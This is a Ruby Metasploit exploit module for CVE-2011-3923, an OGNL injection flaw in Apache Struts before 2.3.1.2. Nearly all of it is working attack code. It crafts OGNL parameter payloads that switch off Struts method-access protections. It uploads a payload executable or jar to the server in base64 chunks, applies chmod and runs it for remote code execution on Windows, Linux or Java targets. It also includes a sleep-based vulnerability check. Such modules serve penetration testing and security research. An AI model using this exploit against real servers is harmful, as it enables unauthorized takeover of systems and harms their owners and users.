Apache Struts ParametersInterceptor Remote Code Execution

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# web site for more information on licensing and terms of use.  
# http://metasploit.com/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::EXE  
include Msf::Exploit::FileDropper  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Apache Struts ParametersInterceptor Remote Code Execution',  
'Description' => %q{  
This module exploits a remote command execution vulnerability in Apache Struts  
versions < 2.3.1.2. This issue is caused because the ParametersInterceptor allows  
for the use of parentheses which in turn allows it to interpret parameter values as  
OGNL expressions during certain exception handling for mismatched data types of  
properties which allows remote attackers to execute arbitrary Java code via a  
crafted parameter.  
},  
'Author' =>  
[  
'Meder Kydyraliev', # Vulnerability Discovery and PoC  
'Richard Hicks <scriptmonkey.blog[at]gmail.com>', # Metasploit Module  
'mihi' #ARCH_JAVA support  
],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'CVE', '2011-3923'],  
[ 'OSVDB', '78501'],  
[ 'URL', 'http://blog.o0o.nu/2012/01/cve-2011-3923-yet-another-struts2.html'],  
[ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-009']  
],  
'Platform' => [ 'win', 'linux', 'java'],  
'Privileged' => true,  
'Targets' =>  
[  
['Windows Universal',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'windows'  
}  
],  
['Linux Universal',  
{  
'Arch' => ARCH_X86,  
'Platform' => 'linux'  
}  
],  
[ 'Java Universal',  
{  
'Arch' => ARCH_JAVA,  
'Platform' => 'java'  
},  
]  
],  
'DisclosureDate' => 'Oct 01 2011',  
'DefaultTarget' => 2))  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('PARAMETER',[ true, 'The parameter to perform injection against.',"username"]),  
OptString.new('TARGETURI', [ true, 'The path to a struts application action with the location to perform the injection', "/blank-struts2/login.action?INJECT"]),  
OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5])  
], self.class)  
end  
  
def execute_command(cmd, opts = {})  
inject = "PARAMETERTOKEN=(#context[\"xwork.MethodAccessor.denyMethodExecution\"]=+new+java.lang.Boolean(false),#_memberAccess[\"allowStaticMethodAccess\"]"  
inject << "=+new+java.lang.Boolean(true),CMD)('meh')&z[(PARAMETERTOKEN)(meh)]=true"  
inject.gsub!(/PARAMETERTOKEN/,Rex::Text::uri_encode(datastore['PARAMETER']))  
inject.gsub!(/CMD/,Rex::Text::uri_encode(cmd))  
uri = String.new(datastore['TARGETURI'])  
uri = normalize_uri(uri)  
uri.gsub!(/INJECT/,inject) # append the injection string  
resp = send_request_cgi({  
'uri' => uri,  
'version' => '1.1',  
'method' => 'GET',  
})  
return resp #Used for check function.  
end  
  
def exploit  
#Set up generic values.  
@payload_exe = rand_text_alphanumeric(4+rand(4))  
pl_exe = generate_payload_exe  
append = 'false'  
#Now arch specific...  
case target['Platform']  
when 'linux'  
@payload_exe = "/tmp/#{@payload_exe}"  
chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{@payload_exe}\".split(\"_\"))"  
exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{@payload_exe}\".split(\"_\"))"  
when 'java'  
@payload_exe << ".jar"  
pl_exe = payload.encoded_jar.pack  
exec_cmd = ""  
exec_cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"  
exec_cmd << "#q.setAccessible(true),#q.set(null,true),"  
exec_cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"  
exec_cmd << "#q.setAccessible(true),#q.set(null,false),"  
exec_cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}').toURI().toURL()}),"  
exec_cmd << "#c=#cl.loadClass('metasploit.Payload'),"  
exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("  
exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"  
when 'windows'  
@payload_exe = "./#{@payload_exe}.exe"  
exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{@payload_exe}')"  
else  
fail_with(Exploit::Failure::NoTarget, 'Unsupported target platform!')  
end  
  
#Now with all the arch specific stuff set, perform the upload.  
#109 = length of command string plus the max length of append.  
sub_from_chunk = 109 + @payload_exe.length + datastore['TARGETURI'].length + datastore['PARAMETER'].length  
chunk_length = 2048 - sub_from_chunk  
chunk_length = ((chunk_length/4).floor)*3  
while pl_exe.length > chunk_length  
java_upload_part(pl_exe[0,chunk_length],@payload_exe,append)  
pl_exe = pl_exe[chunk_length,pl_exe.length - chunk_length]  
append = true  
end  
java_upload_part(pl_exe,@payload_exe,append)  
execute_command(chmod_cmd) if target['Platform'] == 'linux'  
execute_command(exec_cmd)  
register_files_for_cleanup(@payload_exe)  
end  
  
def java_upload_part(part, filename, append = 'false')  
cmd = ""  
cmd << "#f=new java.io.FileOutputStream('#{filename}',#{append}),"  
cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"  
cmd << "#f.close()"  
execute_command(cmd)  
end  
  
def check  
sleep_time = datastore['CHECK_SLEEPTIME']  
check_cmd = "@java.lang.Thread@sleep(#{sleep_time * 1000})"  
t1 = Time.now  
print_status("Asking remote server to sleep for #{sleep_time} seconds")  
response = execute_command(check_cmd)  
t2 = Time.now  
delta = t2 - t1  
  
  
if response.nil?  
return Exploit::CheckCode::Safe  
elsif delta < sleep_time  
return Exploit::CheckCode::Safe  
else  
return Exploit::CheckCode::Appears  
end  
end  
  
end  
`